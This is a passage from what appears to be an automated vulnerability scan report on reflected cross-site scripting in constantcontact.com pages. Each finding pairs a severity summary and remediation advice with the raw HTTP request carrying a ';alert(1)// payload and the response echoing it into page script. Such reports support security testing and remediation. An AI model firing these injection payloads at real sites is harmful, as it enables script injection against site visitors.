Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:52 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:52 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/hints-tips9cd34';alert(1)//7424eac80f3/ht-2010-05b.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664
...[SNIP]...

2.189. http://www.constantcontact.com/learning-center/hints-tips/ht-2010-05b.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/hints-tips/ht-2010-05b.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84907'%3balert(1)//ce7d48600e6 was submitted in the REST URL parameter 3. This input was echoed as 84907';alert(1)//ce7d48600e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/hints-tips/84907'%3balert(1)//ce7d48600e6 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 04:55:01 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=F957EC305F230D1B3D8A5A2F76D94164.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:01 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:01 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511015|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:01 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/learning-center/hints-tips/84907alert(1)//ce7d48600e6|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:01 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
ETag: "0049514e0569a05206f960369f3bb8d5f"
Content-Language: en
Content-Length: 26692
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/hints-tips/84907';alert(1)//ce7d48600e6';
s.server='534';
s.channel='';
s.pageType='';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landing
...[SNIP]...

2.190. http://www.constantcontact.com/learning-center/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6e15'%3balert(1)//00b3a0bb96d was submitted in the REST URL parameter 1. This input was echoed as d6e15';alert(1)//00b3a0bb96d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-centerd6e15'%3balert(1)//00b3a0bb96d/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:54 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=37884956EA0BAC0E4B0887D177F1DA39.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:54 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:54 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:54 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:54 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-centerd6e15';alert(1)//00b3a0bb96d/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.191. http://www.constantcontact.com/learning-center/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /learning-center/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79dcf'%3balert(1)//131f0d59576 was submitted in the REST URL parameter 2. This input was echoed as 79dcf';alert(1)//131f0d59576 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /learning-center/79dcf'%3balert(1)//131f0d59576 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:55:04 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=A2E0E6ADF2A23BBB28CE04C6314FECBC.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511015|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:55:04 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/learning-center/79dcf';alert(1)//131f0d59576/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.192. http://www.constantcontact.com/local/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /local/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ebb0'%3balert(1)//c8ec20dba5b was submitted in the REST URL parameter 1. This input was echoed as 8ebb0';alert(1)//c8ec20dba5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local8ebb0'%3balert(1)//c8ec20dba5b/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:18 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=6EF656B3A8FA711EDABB3AD4E471C3A8.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:18 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:18 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:18 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:18 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/local8ebb0';alert(1)//c8ec20dba5b/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.193. http://www.constantcontact.com/login.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /login.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7edd1'%3balert(1)//2be00039de3 was submitted in the REST URL parameter 1. This input was echoed as 7edd1';alert(1)//2be00039de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7edd1'%3balert(1)//2be00039de3 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:15 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=DDC238AF0D3B82D9D81D7E97188584E3.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:15 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:15 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:15 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:15 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/7edd1';alert(1)//2be00039de3/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.194. http://www.constantcontact.com/media/pdf/get-started-building-your-social-media-presence.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /media/pdf/get-started-building-your-social-media-presence.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb19'%3balert(1)//42197b77f17 was submitted in the REST URL parameter 1. This input was echoed as cbb19';alert(1)//42197b77f17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacbb19'%3balert(1)//42197b77f17/pdf/get-started-building-your-social-media-presence.pdf?id=228t HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.0 404 Not Found
Date: Thu, 25 Nov 2010 04:54:46 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=410C4E78F66BE9CE7940911B5A5B31CB.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
